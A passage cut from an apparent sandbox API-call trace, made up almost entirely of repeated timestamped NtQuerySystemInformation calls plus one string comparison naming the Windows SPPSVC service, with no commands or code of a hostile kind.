Length=0x28, ResultLength=0x0) [0231.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0231.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0231.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0231.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x50, ResultLength=0x0) [0231.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0231.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x28, ResultLength=0x0) [0231.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0231.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0231.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0231.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0231.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0231.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.536] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f8, Length=0x50, ResultLength=0x0) [0231.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x28, ResultLength=0x0) [0231.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0231.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0231.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0231.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0231.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0231.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0231.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0231.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0231.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0231.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0231.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0231.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x28, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0231.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0231.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0231.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0231.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0231.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0231.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x28, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0231.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0231.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, 